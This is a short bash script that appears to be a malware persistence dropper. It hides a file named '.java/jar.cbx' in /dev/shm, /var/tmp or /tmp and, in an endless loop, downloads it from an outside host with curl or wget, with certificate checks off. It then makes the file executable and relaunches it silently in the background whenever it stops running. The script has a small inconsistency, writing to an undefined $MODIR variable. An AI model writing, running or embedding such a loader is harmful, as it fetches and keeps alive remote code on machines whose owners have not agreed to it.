#!/bin/bash

if [ -f '/dev/shm/.java/jar.cbx' ]; then
 d='/dev/shm'
elif [ -f '/var/tmp/.java/jar.cbx' ]; then
 d='/var/tmp'
elif [ -f '/tmp/.java/jar.cbx' ]; then
 d='/tmp'
fi

if [ -f '/usr/bin/curl' ] || [ -f '/usr/sbin/curl' ]; then
      C3="curl --insecure --connect-timeout 10 -s -o $MODIR/.java/jar.cbx"
elif [ -f '/usr/bin/wget' ] || [ -f '/usr/sbin/wget' ]; then
      C3="wget --timeout=10 --tries=2 -q -O $MODIR/.java/jar.cbx"
fi

while true; do
     if [ ! -f "$d/.java/jar.cbx" ]; then
      $C3 https://openstorage.org/leia
      chmod a+x $MODIR/.java/jar.cbx
     fi 

     if ! pgrep -f 'jar.cbx' > /dev/null; then
      bash $MODIR/.java/jar.cbx &>/dev/null &
     fi
     sleep 1
done
